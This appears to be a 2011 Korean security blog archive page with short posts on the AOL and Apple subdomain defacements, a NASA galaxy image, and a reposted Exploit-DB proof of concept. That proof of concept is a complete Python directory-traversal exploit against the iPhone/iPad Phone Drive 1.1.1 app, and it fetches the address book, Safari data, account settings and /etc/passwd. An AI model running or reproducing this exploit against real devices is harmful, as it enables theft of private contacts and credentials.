'글로벌_Gossip/2011'에 해당되는 글 24건

  1. 2011.08.29 AOL Postmaster Website hacked by HODLUM by bitfox
  2. 2011.08.29 Apple 서브 도메인 해킹 by bitfox
  3. 2011.08.10 iPhone/iPad Phone Drive 1.1.1 Directory Traversal by bitfox
  4. 2011.08.08 [NASA] Dust Band Around the Nucleus of "Black Eye Galaxy" M64 by bitfox

AOL Postmaster Website hacked by HODLUM

글로벌_Gossip/2011 2011. 8. 29. 23:07
AOL Postmaster Website hacked by HODLUM

AOL’spostmaster.aol.com website was hacked Saturday afternoon by someone who goes by the name “HodLuM.” The site was slightly defaced with a message from the hacker. “AOL S3RV3RZ ROOT3D BY HODLUM LOLZ!,” the message read.

AOL finally discovered the hack, and fixed the page between two and four hours after evidence of the breach was posted to Reddit.com. The various forums where this hack was posted all included various jokes along the lines of, “AOL still exists?!” Ouch…

The AOL Postermaster blog has so far not responded to the hack. The hack of AOL Postmaster comes at the end of a difficult week for AOL. While the hack of a minor AOL web property has nothing to do with the poor performance of its stock, the incident can only serve to worsen the mood at a company that’s struggling to stay upright.

AOL도 크래킹 되었군요. 비록 서브 도메인이지만... 장난이 심한 HODLUM 크래커들..


[출처] http://www.thehackernews.com/2011/08/aol-postmaster-website-hacked-by-hodlum.html
 

저작자표시 비영리 변경금지

'글로벌_Gossip > 2011' 카테고리의 다른 글

AnDOSid the DOS tool for Android  (0) 2011.08.31
Orange.fr hacked, Database and site source code leaked  (0) 2011.08.29
Apple 서브 도메인 해킹  (0) 2011.08.29
iPhone/iPad Phone Drive 1.1.1 Directory Traversal  (0) 2011.08.10
[NASA] Dust Band Around the Nucleus of "Black Eye Galaxy" M64  (0) 2011.08.08
Posted by bitfox
l

Apple 서브 도메인 해킹

글로벌_Gossip/2011 2011. 8. 29. 23:05
천하의 애플도 당했군요. 메인 도메인은 아니지만 서브 도메인이라도.. 글쎄요. 글로벌 기업에 대한 경험(?)은 있지만 이런 데는 어떻게 되어 있으려나..ㅎ


One of the Apple Sub-Domain claimed to be Defaced By HodLuM as shown above. The Deface Link is just an IMAGE uploaded to Apple domain. Hacker use "N00BZ" word for all Hacker including Anonymous , Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. AOL Postmaster Website was also got hacked by HODLUM some months before.


[출처] : http://www.thehackernews.com/2011/08/apple-website-hacked-by-hodlum.html
저작자표시 비영리 변경금지

'글로벌_Gossip > 2011' 카테고리의 다른 글

AnDOSid the DOS tool for Android  (0) 2011.08.31
Orange.fr hacked, Database and site source code leaked  (0) 2011.08.29
AOL Postmaster Website hacked by HODLUM  (0) 2011.08.29
iPhone/iPad Phone Drive 1.1.1 Directory Traversal  (0) 2011.08.10
[NASA] Dust Band Around the Nucleus of "Black Eye Galaxy" M64  (0) 2011.08.08
Posted by bitfox
l

iPhone/iPad Phone Drive 1.1.1 Directory Traversal

글로벌_Gossip/2011 2011. 8. 10. 11:06
Jailbroken 된 아이폰/아이패드에서 Directory Traversal 취약점 공개.
아래 코드를 보시면 아시겠지만 파이썬으로 개인 주소록을 갈취하는 코드 작성하여
공개되었네요.
역시 Jailbroken은 왠만하면 하지 맙시다.


#!/usr/bin/python
#----------------------------------------------------------------
#Software : iPhone/iPad Phone Drive 1.1.1
#Type of vulnerability : Directory Traversal
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)
#----------------------------------------------------------------
#Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8
#----------------------------------------------------------------
#Discovered by : Khashayar Fereidani
#Team Website : Http://IRCRASH.COM
#English Forums : Http://IRCRASH.COM/forums/
#Team Members : Khashayar Fereidani , Arash Allebrahim
#Email : irancrash [ a t ] gmail [ d o t ] com
#Facebook : http://facebook.com/fereidani
#Twitter : http://twitter.com/ircrash
#----------------------------------------------------------------
import urllib2
def urlread(url,file):
    url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
    u = urllib2.urlopen(url)
    localFile = open('result.html', 'w')
    localFile.write(u.read())
    localFile.close()
    print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT     -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
    url='http://'+url
if ((id>0) and (id<6)):
    file=f[id]
    urlread(url,file)
if (id==6):
    file=raw_input("Enter Local File Address : ")
    urlread(url,file)


[출처] www.exploit-db.com/exploits/17645/

[notice: 악의적인 사용시 사용자 본인에게 책임이 있음을 공지합니다.]
저작자표시 비영리 변경금지

'글로벌_Gossip > 2011' 카테고리의 다른 글

AnDOSid the DOS tool for Android  (0) 2011.08.31
Orange.fr hacked, Database and site source code leaked  (0) 2011.08.29
AOL Postmaster Website hacked by HODLUM  (0) 2011.08.29
Apple 서브 도메인 해킹  (0) 2011.08.29
[NASA] Dust Band Around the Nucleus of "Black Eye Galaxy" M64  (0) 2011.08.08
Posted by bitfox
l

[NASA] Dust Band Around the Nucleus of "Black Eye Galaxy" M64

글로벌_Gossip/2011 2011. 8. 8. 22:38

우주는 신비를 넘어 경의롭다.. :>

[출처] http://hubblesite.org/gallery/album/galaxy/pr2004004a/
저작자표시 비영리 변경금지

'글로벌_Gossip > 2011' 카테고리의 다른 글

AnDOSid the DOS tool for Android  (0) 2011.08.31
Orange.fr hacked, Database and site source code leaked  (0) 2011.08.29
AOL Postmaster Website hacked by HODLUM  (0) 2011.08.29
Apple 서브 도메인 해킹  (0) 2011.08.29
iPhone/iPad Phone Drive 1.1.1 Directory Traversal  (0) 2011.08.10
Posted by bitfox
l
◀ 이전페이지 1 2 3 다음페이지 ▶
블로그 이미지
작은여우와 암행어사 IT Security Consulting History bitfox

최근에 올라온 글

공지사항

글 보관함

최근에 받은 트랙백

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

카테고리

분류 전체보기 (190)
Hello_World! (24)
위험한_친구들 (50)
수술_도구 (20)
생각하는_보안 (20)
삽질이라쓰고_경험이라_읽는다. (10)
글로벌_Gossip (28)
2012 (4)
2011 (24)
나의 관심 (10)
도전_리버서 (5)
도전_외래어 (5)
a Shot a Day (18)

달력

«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

링크

티스토리툴바